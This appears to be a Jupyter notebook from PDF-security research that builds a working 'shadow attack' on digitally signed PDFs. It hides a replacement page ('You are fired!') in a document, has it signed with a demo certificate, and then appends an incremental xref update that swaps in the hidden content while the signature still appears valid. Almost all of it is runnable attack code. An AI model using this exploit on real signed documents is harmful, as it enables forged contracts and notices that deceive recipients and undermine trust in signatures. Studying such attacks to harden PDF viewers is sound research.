# Step 0: Configuration Parameters

In [18]:
folder_path                     = "/media/sf_vladi/Dokumente/git/research/pdf_security/tools/shadow-attacker/pdfs/hide-and-replace/"
signer_path                     ="./pdf-signer/"
input_file                      ="helloworld.pdf"
shadowed_file                   ="shadowed.pdf"
shadowed_file_signed            ="shadowed-signed.pdf"
shadowed_file_signed_manipulated="shadowed-signed-manipulated.pdf"
malicious_content               =b"BT\n/F16 11.9552 Tf 88.425 759.068 Td [(Y)94(ou)-375(are)-375(fired!)]TJ/F15 11.9552 Tf 206.286 -718.09 Td [(1)]TJ\nET\n\n" 

# Step 1: Generating shadow document
The following script places hidden objects with malicious content into the PDF (*input_file*).
The resulted document will be then signed by the signing authority. 

On the presentation level, the new document (*shadowed_file*) does not differ from the previous one (*input_file*).

In [19]:
import mmap
import PyPDF4 as pyPDF
from PyPDF4.generic import *

# clone the original document in the modified one
def cloneDoc():
    pdf_writer.cloneReaderDocumentRoot(pdf_reader)

# Creates an empty signature field which will be used later by the signer
# This is only executed if not signature field is existing in the document
def create_sig_annotation():
    bsDict = DictionaryObject()
    bsDict.update({
        NameObject("/W"):NumberObject(0), 
        NameObject("/S"):NameObject("/S")})
    
    encodingDict=DictionaryObject()
    encodingDict.update({
        NameObject("/Type"):NameObject("/Encoding"),
        NameObject("/Differences"):ArrayObject({
            NumberObject(24),NameObject("/breve"),NameObject("/caron"),NameObject("/circumflex"),
            NameObject("/dotaccent"),NameObject("/hungarumlaut"),NameObject("/ogonek"),NameObject("/ring")})})
    pdf_writer._addObject(encodingDict)

    helvDict = DictionaryObject()
    helvDict.update({
        NameObject("/BaseFont"):NameObject("/Helvetica"),
        NameObject("/Name"):NameObject("/Helv"),
        NameObject("/Subtype"):NameObject("/Type1"),
        NameObject("/Type"):NameObject("/Font"),
        NameObject("/Encoding"):IndirectObject(pdf_writer.getReference(encodingDict).idnum, 0, pdf_writer)})
    pdf_writer._addObject(helvDict)

    zaDB = DictionaryObject()
    zaDB.update({
        NameObject("/BaseFont"):NameObject("/ZapfDingbats"),
        NameObject("/Name"):NameObject("/ZaDb"),
        NameObject("/Subtype"):NameObject("/Type1"),
        NameObject("/Type"):NameObject("/Font")})
    pdf_writer._addObject(zaDB)

    dr_resources = DictionaryObject({
        NameObject("/Encoding"):DictionaryObject({
            NameObject("/PDFDocEncoding"):IndirectObject(pdf_writer.getReference(encodingDict).idnum, 0, pdf_writer)}), 
            NameObject("/Font"):DictionaryObject({
                NameObject("/Helv"):IndirectObject(pdf_writer.getReference(helvDict).idnum, 0, pdf_writer), 
                NameObject("/ZaDb"):IndirectObject(pdf_writer.getReference(zaDB).idnum, 0, pdf_writer)
            })
        })

    nDict = DictionaryObject()
    nDict.update({
        NameObject("/BBox"):RectangleObject([0,0,171,50]), 
        NameObject("/Resources"):dr_resources
    })
    pdf_writer._addObject(nDict)

    #TODO: Reference to Page must be fixed: IndirectObject(pdf_writer.getReference(pdf_writer._objects[0]).idnum
    annotObj = DictionaryObject()
    annotObj.update ({
        NameObject("/Type"):NameObject("/Annot"), 
        NameObject("/SubType"):NameObject("/Widget"),
        NameObject("/FT"):NameObject("/Sig"), 
        NameObject("/Rect"):RectangleObject([150.0,400.0,450.0,480.0]),
        NameObject("/T"):createStringObject("Signature1"),
        NameObject("/BS"):bsDict, 
        # NameObject("/P"):IndirectObject(pdf_writer.getReference(pdf_writer._objects[0]).idnum, 0, pdf_writer),
        NameObject("/DA"):NameObject("(/Helvetica 0.0 Tf 0.0 0.0 0.0 rg)"),
        NameObject("/MK"):DictionaryObject(),
        NameObject("/F"):NumberObject(4),
        NameObject("/AP"):DictionaryObject({NameObject("/N"):IndirectObject(pdf_writer.getReference(nDict).idnum, 0, pdf_writer)})})
    pdf_writer._addObject(annotObj)
    return annotObj,dr_resources

# Creates an annotation referencing to the empty signature filed which will be used later by the signer
# This is only executed if not signature field is existing in the document
def create_empty_signature_field ():
    sigAnnot, rdResources = create_sig_annotation()
    tmpObj = DictionaryObject()
    arrayObj = ArrayObject()
    arrayObj.append(IndirectObject(pdf_writer.getReference(sigAnnot).idnum, 0, pdf_writer))
    tmpObj.update({
        NameObject("/DA"): NameObject("(/Helv 0 Tf 0 g)"),
        NameObject("/SigFlags"): NumberObject(1),
        NameObject("/Fields"): arrayObj,
        NameObject("/DR"):rdResources})
    pdf_writer._addObject(tmpObj)
    
    catalog = pdf_writer._root_object.getObject()
    catalog.update({NameObject("/AcroForm"): IndirectObject(pdf_writer.getReference(tmpObj).idnum, 0, pdf_writer)})

## creates all shadow objects containing the malicious content
def create_shadow_objects():
    # Contents of the Page, which will be displayed after the modification
    contents = DecodedStreamObject()
    contents.setData(malicious_content)
    pdf_writer._addObject(contents)

    new_page = DictionaryObject()
    old_page = pdf_reader.getPage(0)
    
    for key, val in old_page.items():
        if f"{key}".startswith('/Contents'):
            new_page.update({NameObject(key):IndirectObject(pdf_writer.getReference(contents).idnum, 0, pdf_writer)})
        else:
            new_page.update({NameObject(key):val})
    new_page.update({NameObject("/Parent"):NameObject("6666 0 R")})
    pdf_writer._addObject(new_page)

    new_pages = DictionaryObject()
    old_pages = pdf_reader.resolvedObjects[0, find_ObjectIDByType(pdf_reader, "/Pages")]
    for key, val in old_pages.items():
        if f"{key}".startswith('/Kids'):
            newKids = ArrayObject({})
            newKids.append(IndirectObject(pdf_writer.getReference(new_page).idnum, 0, pdf_writer))          
            new_pages.update({NameObject(key):newKids})
        elif f"{key}".startswith('/Count'):
            new_pages.update({NameObject("/Count"):NumberObject(1)})
        else:
            new_pages.update({NameObject(key):val})
    pdf_writer._addObject(new_pages)
   
    return pdf_writer.getReference(new_pages).idnum

def find_ObjectIDByType (pdf, needle):
    for key, val in pdf_reader.resolvedObjects.items():
        if val['/Type'] == needle:
            return key[1]

def replacePagesID (originalID, shadowedID):
    #read input file
    fin = open(folder_path+shadowed_file, "rb")
    #read file contents to string
    data = fin.read()
    paddingStr = " "* (len("6666")-len({originalID})-1)
    #replace all occurrences of the required string
    data = data.replace(b"\n"+bytes(f"{shadowedID}","utf-8")+b" 0 obj\n", b"\n"+bytes(f"{originalID}","utf-8")+b" 0 obj"+b"\n")
    # replace dummy reference and pad correctly
    data = data.replace(b"6666 0 R",bytes(f"{originalID}","utf-8")+b" 0 R"+bytes(paddingStr,"utf-8"))
    #close the input file
    fin.close()
    #open the input file in write mode
    fin = open(folder_path+shadowed_file, "wb")
    #overrite the input file with the resulting data
    fin.write(data)
    #close the file
    fin.close()

# Finds the Byte postion of a string in a file
def findBytePositionOfText(file,word):
    mf = mmap.mmap(file.fileno(), 0)
    mf.seek(0) # reset file cursor
    startPos=0
    endPos=0
    for m in re.finditer(bytes(word, "utf-8"), mf):
        startPos = m.start()
        endPos = m.end()
    return startPos, endPos

def acroform_provided():
    for key, val in pdf_reader.getFields().items():
        print(val["/FT"])
        if val["/FT"] == "/Sig":
            print("Signature Field in file detected. Nothing to do!")
        else:
            sigAnnot, rdResources = create_sig_annotation()
            fieldsArray = pdf_reader.trailer["/Root"]["/AcroForm"]["/Fields"]
            fieldsArray.append(IndirectObject(pdf_writer.getReference(sigAnnot).idnum, 0, pdf_writer))
            tmpObj = DictionaryObject()
            tmpObj.update({NameObject("/DA"): NameObject("(/Helv 0 Tf 0 g)"),NameObject("/SigFlags"): NumberObject(1),NameObject("/Fields"): fieldsArray,NameObject("/DR"):rdResources})
            pdf_writer._addObject(tmpObj)
            catalog = pdf_writer._root_object.getObject()
            catalog.update({NameObject("/AcroForm"): IndirectObject(pdf_writer.getReference(tmpObj).idnum, 0, pdf_writer)})


    fields = pdf_reader.getFields()["Signature1"]



# Step 1: read the original document and create a new one for the manipulations
pdf_reader = pyPDF.PdfFileReader(open(folder_path+input_file, mode="rb"))
list(pdf_reader.pages) # Process all the objects. 
pdf_writer = pyPDF.PdfFileWriter()

# Step 2: Clone the original document into the manipulated one
cloneDoc()

# Step 3: Insert an empty signature field
# TODO: Check also if a Signature Field is provided
catalog = pdf_reader.trailer["/Root"].getObject()
if "/AcroForm" in catalog:
    acroform_provided()
else:
    create_empty_signature_field()

# Step 4: Create the shadow objects with the malicious content
shadowPagesObjID = create_shadow_objects()

# Step 5: Store the manipulated file
with open(folder_path+shadowed_file, "wb") as filehandle_output:
    pdf_writer.write(filehandle_output)

# Step 6: Last Anjustments for the shadow attack:
# - the shadow objects need to have the same object ID as the original ones
shadow_pdf = pyPDF.PdfFileReader(open(folder_path+shadowed_file, mode="rb"))
list(shadow_pdf.pages) # Process all the objects.
for key, val in shadow_pdf.trailer["/Root"].items():
        if f"{key}".startswith('/Pages'):
            originalPagesObjID = val.idnum
replacePagesID(originalPagesObjID,shadowPagesObjID)



# Step 2: Sign the document

In [20]:
os.system('java -jar '+signer_path+'pdfsigner.jar -i '+folder_path+shadowed_file+' -o '+folder_path+shadowed_file_signed+' -pkcs '+signer_path+'demo-rsa2048.p12 -password demo-rsa2048 -sigtype approval -sigview visible -sigimg '+signer_path+'PdfInsecurityTeam-Logo.png')

0

# Step 3: Manipulate the signed document

In [21]:
# Step 1: Read the signed files
shadow_pdf_signed = pyPDF.PdfFileReader(open(folder_path+shadowed_file_signed, mode="rb"))
signed = open(folder_path+shadowed_file_signed, "r+b")
data = signed.read()

# Step 2: Prepare the new Xref table and trailer which will be appended
startOldXref,endOldXref=findBytePositionOfText(signed, "startxref")
endFile,startNewXRef=findBytePositionOfText(signed,"%%EOF\n")

trailerStr = "trailer\n<<\n"
for key,val in shadow_pdf_signed.trailer.items():
    if isinstance(val, IndirectObject):
         trailerStr += f"{key} {val.idnum} 0 R\n"
    elif key.startswith("/ID"):
         trailerStr += "/ID [<6B91C28C4BC9FAD39780F7874AAEDD45> <6B91C28C4BC9FAD39780F7874AAEDD45>]\n"
    elif key.startswith("/Prev"):
        trailerStr += f"/Prev {int(data[endOldXref+1:endFile-1])}"
    else:
        trailerStr += f"{key} {val} \n"
trailerStr +=">>\n"

# Step 3: Append the new Xref table and trailer incrementally to the file
incUpdateStr = f"xref\n{originalPagesObjID} 1\n{shadow_pdf_signed.xref.get(0)[shadowPagesObjID]:010} {0:05} n\r\n{trailerStr}startxref\n{startNewXRef}\n%%EOF\n"
data += bytes(incUpdateStr,"utf-8");

# Step 4: Store the manipulated file
fin = open(folder_path+shadowed_file_signed_manipulated, "wb")
fin.write(data)
fin.close()